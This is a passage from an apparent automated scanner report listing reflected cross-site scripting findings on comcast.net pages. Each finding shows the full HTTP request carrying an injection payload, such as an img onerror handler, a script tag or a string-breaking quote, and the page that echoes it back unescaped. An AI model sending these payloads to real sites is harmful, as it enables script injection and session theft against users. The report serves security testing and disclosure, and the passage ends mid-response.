The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7d8b0<img%20src%3da%20onerror%3dalert(1)>4a28518cd5 was submitted in the REST URL parameter 2. This input was echoed as 7d8b0<img src=a onerror=alert(1)>4a28518cd5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /articles/sports-cbk7d8b0<img%20src%3da%20onerror%3dalert(1)>4a28518cd5/20101218/T25-USC-Kansas/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:50 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:50 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='sports' subchannel'cbk7d8b0<img src=a onerror=alert(1)>4a28518cd5'</h2>
...[SNIP]...

2.144. http://www.comcast.net/articles/sports-mlb/20101219/wise-greinketraded/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /articles/sports-mlb/20101219/wise-greinketraded/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 72ecb<img%20src%3da%20onerror%3dalert(1)>ee671481b9b was submitted in the REST URL parameter 2. This input was echoed as 72ecb<img src=a onerror=alert(1)>ee671481b9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /articles/sports-mlb72ecb<img%20src%3da%20onerror%3dalert(1)>ee671481b9b/20101219/wise-greinketraded/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:46 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:46 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='sports' subchannel'mlb72ecb<img src=a onerror=alert(1)>ee671481b9b'</h2>
...[SNIP]...

2.145. http://www.comcast.net/articles/sports-mlb/20101219/wise-greinketraded/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.comcast.net
Path:   /articles/sports-mlb/20101219/wise-greinketraded/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5f8d'%3ba545177219c was submitted in the REST URL parameter 2. This input was echoed as d5f8d';a545177219c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/sports-mlbd5f8d'%3ba545177219c/20101219/wise-greinketraded/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:42 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:42 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
</', 'script>'
       ].join(''));
       if (parseFloat(navigator.appVersion) == 0) {
           var ad_url = gau('http://oascentral.comcast.net/RealMedia/ads/adstream_sx.ads/',
               edata,
               'comcast.net/sports/mlbd5f8d';a545177219c/',
               '@x17',
               randomNumber
           );
           document.write([
               '<iframe ',
               'width="300" ',
               'height="250" ',
               'marginwidth="0" ',
               'marginheight="0" ',
               'hspace="0" ',
               'vspace="0" '
...[SNIP]...

2.146. http://www.comcast.net/articles/sports-mlb/20101219/wise-greinketraded/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.comcast.net
Path:   /articles/sports-mlb/20101219/wise-greinketraded/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31d78"%3bf24acd488c8 was submitted in the REST URL parameter 2. This input was echoed as 31d78";f24acd488c8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/sports-mlb31d78"%3bf24acd488c8/20101219/wise-greinketraded/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:41 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:41 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
rOasAd();
   }
   
   function renderOasAd(){
       var minNum = 10000000, maxNum = 99999999;
       var randomNumber = Math.round(Math.random()*(maxNum-minNum))+minNum;
       
       var oas_ad_path = "comcast.net/sports/mlb31d78";f24acd488c8/";
               
       var ad_url = gau('http://oascentral.comcast.net/RealMedia/ads/adstream_jx.ads/',
           edata,
           oas_ad_path,
           '@x17',
           randomNumber
       );
       document.write("<div id='variable_adholder'>
...[SNIP]...

2.147. http://www.comcast.net/articles/sports-nfl/20101219/Jaguars-Colts.Inactives/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /articles/sports-nfl/20101219/Jaguars-Colts.Inactives/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b9d89<img%20src%3da%20onerror%3dalert(1)>a003304798 was submitted in the REST URL parameter 2. This input was echoed as b9d89<img src=a onerror=alert(1)>a003304798 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /articles/sports-nflb9d89<img%20src%3da%20onerror%3dalert(1)>a003304798/20101219/Jaguars-Colts.Inactives/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:50 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:50 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='sports' subchannel'nflb9d89<img src=a onerror=alert(1)>a003304798'</h2>
...[SNIP]...

2.148. http://www.comcast.net/articles/sports-nfl/20101219/Jaguars-Colts.Inactives/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.comcast.net
Path:   /articles/sports-nfl/20101219/Jaguars-Colts.Inactives/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30c4d"%3b7eb771f3fbf was submitted in the REST URL parameter 2. This input was echoed as 30c4d";7eb771f3fbf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/sports-nfl30c4d"%3b7eb771f3fbf/20101219/Jaguars-Colts.Inactives/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:43 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:43 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
rOasAd();
   }
   
   function renderOasAd(){
       var minNum = 10000000, maxNum = 99999999;
       var randomNumber = Math.round(Math.random()*(maxNum-minNum))+minNum;
       
       var oas_ad_path = "comcast.net/sports/nfl30c4d";7eb771f3fbf/";
               
       var ad_url = gau('http://oascentral.comcast.net/RealMedia/ads/adstream_jx.ads/',
           edata,
           oas_ad_path,
           '@x17',
           randomNumber
       );
       document.write("<div id='variable_adholder'>
...[SNIP]...

2.149. http://www.comcast.net/articles/sports-nfl/20101219/Jaguars-Colts.Inactives/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.comcast.net
Path:   /articles/sports-nfl/20101219/Jaguars-Colts.Inactives/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b123'%3bc5f8a8bc2aa was submitted in the REST URL parameter 2. This input was echoed as 4b123';c5f8a8bc2aa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/sports-nfl4b123'%3bc5f8a8bc2aa/20101219/Jaguars-Colts.Inactives/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:44 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:44 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
</', 'script>'
       ].join(''));
       if (parseFloat(navigator.appVersion) == 0) {
           var ad_url = gau('http://oascentral.comcast.net/RealMedia/ads/adstream_sx.ads/',
               edata,
               'comcast.net/sports/nfl4b123';c5f8a8bc2aa/',
               '@x17',
               randomNumber
           );
           document.write([
               '<iframe ',
               'width="300" ',
               'height="250" ',
               'marginwidth="0" ',
               'marginheight="0" ',
               'hspace="0" ',
               'vspace="0" '
...[SNIP]...

2.150. http://www.comcast.net/entertainment/reelnews [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /entertainment/reelnews

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload d868f--><img%20src%3da%20onerror%3dalert(1)>5e235b0f13a was submitted in the REST URL parameter 2. This input was echoed as d868f--><img src=a onerror=alert(1)>5e235b0f13a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /entertainment/reelnewsd868f--><img%20src%3da%20onerror%3dalert(1)>5e235b0f13a HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:01 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:01 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<!-- subchannel: reelnewsd868f--><img src=a onerror=alert(1)>5e235b0f13a -->
...[SNIP]...

2.151. http://www.comcast.net/entertainment/reelnews [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /entertainment/reelnews

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a6cf7<img%20src%3da%20onerror%3dalert(1)>e7ac8a1e642 was submitted in the REST URL parameter 2. This input was echoed as a6cf7<img src=a onerror=alert(1)>e7ac8a1e642 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /entertainment/reelnewsa6cf7<img%20src%3da%20onerror%3dalert(1)>e7ac8a1e642 HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:54 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:54 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:18:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='entertainment' subchannel'reelnewsa6cf7<img src=a onerror=alert(1)>e7ac8a1e642'</h2>
...[SNIP]...

2.152. http://www.comcast.net/entertainment/reelnews [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /entertainment/reelnews

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb8d2"><script>alert(1)</script>befae20f7ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /entertainment/reelnewsfb8d2"><script>alert(1)</script>befae20f7ae HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:43 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:43 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:18:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<link rel="alternate" href="/feeds/rss/entertainment/reelnewsfb8d2"><script>alert(1)</script>befae20f7ae/" type="application/rss+xml" title="Comcast.net - Entertainment" id="rss" />
...[SNIP]...

2.153. http://www.comcast.net/finance/forwhatitsworth/6470358/outrageousceoperksthisyearstoppicks/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /finance/forwhatitsworth/6470358/outrageousceoperksthisyearstoppicks/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload c6f94--><img%20src%3da%20onerror%3dalert(1)>39e088bf6ea was submitted in the REST URL parameter 2. This input was echoed as c6f94--><img src=a onerror=alert(1)>39e088bf6ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /finance/forwhatitsworthc6f94--><img%20src%3da%20onerror%3dalert(1)>39e088bf6ea/6470358/outrageousceoperksthisyearstoppicks/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:11 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:11 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 145978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


